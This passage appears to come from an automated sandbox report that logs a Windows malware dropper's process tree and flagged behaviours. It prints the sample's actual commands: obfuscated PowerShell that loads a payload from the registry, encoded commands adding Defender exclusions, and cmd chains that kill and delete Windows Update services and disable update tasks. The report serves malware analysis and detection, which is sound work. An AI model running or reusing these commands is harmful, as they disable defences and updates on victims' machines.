598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe jshainx.exe PID 3596 wrote to memory of 4112 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe MouseAtHome.exe PID 3596 wrote to memory of 4112 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe MouseAtHome.exe PID 3596 wrote to memory of 4112 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe MouseAtHome.exe PID 1336 wrote to memory of 4220 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4220 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4220 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4220 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3920 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3920 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3920 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3920 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4492 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4492 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4492 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4492 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 3596 wrote to memory of 6068 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe EU1.exe PID 3596 wrote to memory of 6068 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe EU1.exe PID 3596 wrote to memory of 6068 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe EU1.exe PID 1336 wrote to memory of 5064 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 5064 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 5064 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 5064 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4980 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4980 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4980 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4980 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 4112 wrote to memory of 4832 4112 MouseAtHome.exe WindowsDefender.exe PID 4112 wrote to memory of 4832 4112 MouseAtHome.exe WindowsDefender.exe PID 4112 wrote to memory of 5220 4112 MouseAtHome.exe Windows.exe PID 4112 wrote to memory of 5220 4112 MouseAtHome.exe Windows.exe PID 4112 wrote to memory of 5220 4112 MouseAtHome.exe Windows.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f17f1ecd-6e21-4df7-a6f5-ec18b441dc1c}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ed8471e8-e9c2-43da-b081-16793679315a}2⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ed8471e8-e9c2-43da-b081-16793679315a}2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHgAcwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABEAGUAZgBlAG4AZABlAHIAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwB4AG8AIwA+AA=="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Defender\updater.exe"C:\Program Files\Defender\updater.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Defender\updater.exe"4⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZQB2AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAaQB1AHUAIwA+AA=="5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "vktwbryast"5⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe ipbedfnzjahdakqh1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4eAoR+/sMI7GkWIp7kzt33mbRgFNWCnFMaeMKFES0bIFWeyERnCk6Cca6inZazVZL2NRgqXM5YGjKskzonMW4pRj1hd/GPPUtddJe8zDZNRC1MNGnbEKRTt1kwAWqH0zEt5⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1912 -s 7842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3660 -s 11802⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3660 -s 11602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe"C:\Users\Admin\AppData\Local\Temp\598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe"2⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\safert44.exe"C:\Program Files (x86)\Company\NewProduct\safert44.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\real.exe"C:\Program Files (x86)\Company\NewProduct\real.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 12604⤵
- Program crash
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exe"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\tag.exe"C:\Program Files (x86)\Company\NewProduct\tag.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exe"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe"C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZgB0ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQQBsAGwAIAB2AGkAcgB1AHMAZQBzACAAaABhAHMAIABiAGUAZQBuACAAZABlAGwAZQB0AGUAZAAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdgBkAGUAIwA+AA=="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcQBoACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Windows Defender.exe"C:\Users\Admin\Windows Defender.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Windows Defender.exe"6⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZQB2AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAaQB1AHUAIwA+AA=="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc8⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc8⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv8⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits8⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc8⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f8⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f8⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f8⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE8⤵
-
